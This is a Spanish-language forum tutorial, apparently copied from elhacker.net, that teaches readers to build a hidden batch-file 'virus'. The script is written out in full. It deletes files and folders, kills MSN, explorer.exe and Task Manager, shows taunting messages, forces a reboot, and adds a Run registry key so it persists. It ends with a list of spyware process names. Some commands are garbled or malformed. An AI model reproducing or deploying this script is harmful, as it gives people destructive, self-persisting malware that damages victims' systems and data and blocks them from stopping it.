Procesos (Y .Bat)
Procesos (Y .Bat)
Procesos (Y .Bat)
Hola, bueno un pequeño manual para la gente que le gusta el Batch o lo quiere aprender.
¿QUE ES BATCH?
Un archivo batch es un archivo de procesamiento por lotes: se trata de archivos de texto sin
formato, guardados con la extensión *.bat que contienen un conjunto de comandos DOS.
Cuando se ejecuta este archivo bat, los comandos contenidos son ejecutados en grupo, de
forma secuencial, permitiendo automatizar diversas tareas. Los comandos son así como los del
MS-Dos.
Queras que el virus borre data, cierre MSN, borre una carpeta, desaparezca el explore y que la
reinicie dando un mensaje. Y esto que se añada a un registro
Nuestro "virus" será en forma oculta y en .exe (Luego les digo como)
Ahora, no pondremos echo pero si msg*. Echo no pondremos porque estará en forma oculta y
no leerlo
: borrar
del c:/Windows/archivos.exe (Tu lo cambias)
del c:/carpeta/file.exe
msg* Escúchame
msg* Se te esta llendo todo al tacho
msg* Lo siento xD
goto cerrar (me lleva al goto cerrar)
: cerrar
taskkill /f msnmsgr.exe -> proceso del MSN.
Goto carpeta del
ahora vamos por el goto que borrara carpeta que será carpeta del (Debemos poner goto
carpeta del aunque no es necesario. mirar arriba)
: carpeta del
rd c:/carpeta
rd c:/archivos
goto killexp
: killexp
taskkill /f /im explorer.exe
si quieres matar otro solo remplaza el "explorer.exe"
goto shutdown
: shutdown
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido." lo que está en " " es el comentario que
dará.
Goto borrar
Como verán no es necesario poner goto x así que no lo pondremos. Tampoco es necesario
separarlo por goto
del c:/Windows/archivos.exe
del c:/carpeta/file.exe
msg* Escuchame
msg* Se te esta llendo todo al tacho
msg* Lo siento xD
taskkill /f msnmsgr.exe
rd c:/carpeta
rd c:/archivos
taskkill /f /im explorer.exe
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido."
el @echo off (Aun que será de forma oculta, pero pues lo pondremos)
y el nuevo registro así cada vez que se prenda pase yo recomiendo añadir un taskkill al
administrador de tares (taskmgr), así no cierra el batch.
@echo off
reg add hklmsoftwaremicrosoftwindowscurrentversionrun /v skls /t reg_sz /d juego.bat /f
taskkill /f /im taskmgr.exe
del c:/windows/archivos.exe
taskkill /f /im taskmgr.exe
del c:/carpeta/file.exe
taskkill /f /im taskmgr.exe
msg* Escúchame
taskkill /f /im taskmgr.exe
msg* Se te esta llendo todo al tacho
taskkill /f /im taskmgr.exe
msg* Lo siento xD
taskkill /f /im taskmgr.exe
taskkill /f msnmsgr.exe.
taskkill /f /im taskmgr.exe
rd c:/carpeta
taskkill /f /im taskmgr.exe
rd c:/archivos
taskkill /f /im taskmgr.exe
taskkill /f /im explorer.exe
taskkill /f /im taskmgr.exe
SHUTDOWN -R -F -T 30 -C "Amigo, estas perdido."
<Por qué repito el mata administrador de tareas? Para que cuando lo quiera iniciar mientras
esta el virus corriendo no pueda
Y ya, ese mismo tiene la opción de ejecutarlo de forma oculta y ya nos queda. Ahora a jugar.
Es una lista de procesos malignos
absr.exe - Virus AUTOUPDER
aconti.exe - DIALER
adp.exe - spyware que Se instala con Net2Phone, Limewire, Cydoor, Grokster, KaZaa, etc
cnbabe.exe - spyware
ctbclick.exe - spyware
dssagent.exe - spyware
fhfmm.exe - spyware
flydesk.exe - spyware
hbinst.exe
hcwprn.exe - spyware
kkcomp.exe - spyware
kvnab.exe - spyware
liqad.exe - spyware
liqui.exe - spyware
mslogon.exe - spyware;
newsupd.exe - spyware
npnsdad.exe - spyware
npnzdad.exe - spyware
onflow.exe
owmngr.exe - spyware que cambia la configuracion del internet explorer, muestra publicidad
real-tens.exe - spyware
tasktray.exe - spyware
win32_i.exe - spyware
windfind.exe - DIALER
winservn.exe - spyware
xadbrk.exe - spyware
xupiterstartup.exe
Matar Un Proceso.
Podes saber los programas que están rondando con el administrador de tareas, usa nadamas
los que tengan el nombre de usuario, que son los programas que usas
el /im es el nombre del proceso le vas a decir que proceso quieres matar y
mi batch
@echo off
cls
color 0a
echo ******************************************************************
echo.
echo.
echo *****************************************************************
pause> nul
Read more:
http://foro.elhacker.net/hacking_basico/matar_el_proceso_explorerexe_desde_un_bat-
t104020.0.html#ixzz0xSmoQRg2